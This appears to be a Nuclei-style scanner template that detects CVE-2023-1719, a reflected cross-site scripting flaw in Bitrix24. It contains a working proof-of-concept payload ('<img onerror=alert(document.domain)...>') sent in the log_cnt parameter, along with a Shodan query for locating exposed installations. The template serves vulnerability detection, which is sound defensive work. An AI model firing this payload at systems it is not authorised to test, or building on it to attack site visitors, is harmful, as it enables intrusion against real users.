id: CVE-2023-1719

info:
  name: Bitrix Component - Cross-Site Scripting
  author: DhiyaneshDk
  severity: critical
  description: |
    Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables.
  reference:
    - https://starlabs.sg/advisories/23/23-1719/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1719
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-1719
    cwe-id: CWE-665
    epss-score: 0.02807
    epss-percentile: 0.8953
    cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: bitrix24
    product: bitrix24
    shodan-query: html:"/bitrix/"
  tags: cve,cve2023,bitrix,xss,bitrix24

http:
  - method: GET
    path:
      - "{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'LOG_CNT':"
          - "<img onerror=alert(document.domain) src=1>"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ef00a1892c68fc81d9814a2fd25511cd4dcbe6053c4f9582f4fae7009fab805d02205b647a369f89f40bc31e121b27064cc12f7ba5000ee7ae2739c41a98c31be736:922c64590222798bb761d5b6d8e72950